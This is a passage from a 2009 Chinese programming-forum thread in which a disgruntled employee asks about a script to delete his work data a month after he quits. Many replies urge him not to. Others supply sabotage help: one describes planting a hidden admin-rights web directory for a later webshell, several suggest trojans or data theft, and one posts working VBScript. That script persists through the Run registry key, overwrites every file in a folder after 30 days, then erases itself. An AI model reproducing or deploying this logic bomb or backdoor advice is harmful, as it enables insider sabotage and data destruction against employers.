跟东家闹翻了,想报复

lhjlhjlhj 2009-07-15 07:39:10
本人木讷、本分,在一家单位工作7年了,东家太刻薄,想报复,就搞了个脚本,想在本人离开一个月后自动删除本人整整收集了7年的资料,托否?大家给个意见,谢谢啦!
...全文
83 46 打赏 收藏 转发到动态 举报
写回复
用AI写文章
46 条回复
切换为时间正序
请发表友善的回复…
发表回复
loner_hqn 2009-07-17
  • 打赏
  • 举报
回复
[Quote=引用 21 楼 jiguoguo 的回复:]
很简单啊。有fso权限就可以了。但是缺的是事情我不做。我不写代码给你。你自己研究下
[/Quote]
最好别这样子搞 三思 免得 吃官司
lvveve 2009-07-17
  • 打赏
  • 举报
回复
还是忍一手吧!
半山闲人 2009-07-17
  • 打赏
  • 举报
回复
如果是公司的资料,那便是公司的财产,不论你以任何借口来删,但只要有主观故意,那么轻则而临民事赔偿,重则就是犯罪,想清楚吧,哥们!
toury 2009-07-16
  • 打赏
  • 举报
回复
去掉木讷缺点,保持【本分】品质。
yct0605 2009-07-16
  • 打赏
  • 举报
回复
走之前删除就完事了。
gjws_01 2009-07-16
  • 打赏
  • 举报
回复
好帖
Msxindl_Com 2009-07-16
  • 打赏
  • 举报
回复
你完全可以在走之前删除你个人的资料!
KK3K2005 2009-07-16
  • 打赏
  • 举报
回复
那你还忍7年啊
不合则分 吧时间花在找好单位上
peng_yaoming 2009-07-16
  • 打赏
  • 举报
回复
严以律己,宽以待人。你应该换种心态——是他的个人素质差矣,庆幸自己保留高尚情操。算了,他走不远的,放心。静下心重新开始咯,lz。希望你可以做到!
另外,记住了,职业道德什么时候都不要犯。
ball7pen 2009-07-16
  • 打赏
  • 举报
回复
如果大家都和你有同样的感受,那说明你老板确实是一奸商、为富不仁,删除自己收集的资料有什么问题,一个字----删!
spkl1 2009-07-16
  • 打赏
  • 举报
回复
在服务器上新开个网站,或者新开个已有网站的目录,里面放个最简单的fso创建文件,给目录赋权限为管理员权限,目录的默认登录账号为管理员,日后通过fso在目录下建立免杀网马,因为开了最大权限,所以直接可以操作系统的各个盘符,想做什么就去做吧
smartcatiboy 2009-07-16
  • 打赏
  • 举报
回复
'下面的代码仅仅为学习研究用途,严禁其他用途。
'保存为vbs代码,保存于任意文件夹下,点击运行即可。

option explicit
const gc_RunKey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AutoDel"
const gc_DelFolder="deltest" '你要删的文件夹
const gc_Deadline=30 '删除期限

dim gc_objWsh,gc_objFso
set gc_objWsh=createObject("WScript.Shell")
set gc_objFso=createobject("Scripting.filesystemobject")

main:sub main()
call install()
if datediff("d",gc_objFso.getFile(WScript.ScriptFullName).DateCreated,now())>gc_Deadline then
call AutoDel(gc_objFso.getFolder(gc_DelFolder))
call uninstall()
end if
end sub

sub install()
on error resume next
call gc_objWsh.RegWrite(gc_RunKey,WScript.ScriptFullName,"REG_SZ")
call err.clear()
end sub

sub uninstall()
on error resume next
call gc_objFso.deleteFile(WScript.ScriptFullName,True)
call gc_objWsh.RegDelete(gc_RunKey)
call err.clear()
end sub

sub AutoDel(objFolder)
dim objSubFolder,objFile
on error resume next

for each objSubFolder in objFolder.subFolders
call AutoDel(objSubFolder)
next

for each objFile in objFolder.Files
call objFile.openAsTextStream(2).write("IFKHZfZOhHYvZgBOKk4IZ01Sq4gAX2SWhHYqcwAA==")
next
'bubble err cause try again , or use err.clear()
end sub
AeroRoad 2009-07-16
  • 打赏
  • 举报
回复
楼上说的很对,做这种事情,自能对自己不利。

想开点,你窃取点资料就行了,神不知鬼不觉的。

不要搞破坏。
iJasonCooper 2009-07-16
  • 打赏
  • 举报
回复
还是别干这样的事情,前几天不是刚有报道过,也是这样的办法报复东家,结果很明显犯法了,赔了钱还损了自己的名誉,吃牢饭,找个别的单位和他竞争,让他们知道失去你是他们的错。
sh8596 2009-07-16
  • 打赏
  • 举报
回复
lz要是想搞,就不用在这说了,只是在这发泄一下就好
黑心 2009-07-16
  • 打赏
  • 举报
回复

查到了才叫违法。

查不到是你,就不叫违法。这就一个高明。(一般情况不要干。十恶不赦才干。)
jiguoguo 2009-07-16
  • 打赏
  • 举报
回复
很简单啊。有fso权限就可以了。但是缺的是事情我不做。我不写代码给你。你自己研究下
xxrl 2009-07-16
  • 打赏
  • 举报
回复
继续本分
junjun1984 2009-07-16
  • 打赏
  • 举报
回复
[Quote=引用 18 楼 mahui19780126 的回复:]
不要删,把自己代码弄乱,加点木马。明删不好,可能要负责的。你只好暗暗的来。
[/Quote]
晕~~~~~~
Linzhe423 2009-07-16
  • 打赏
  • 举报
回复
佛曰:你不入地狱,谁入地狱.,.

最好还是拖走他的客户来得实在.,

你的一些方法资料,就算你带走了,
可能他其它地方还找得到,比如FTP上...
加载更多回复(26)

28,390

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧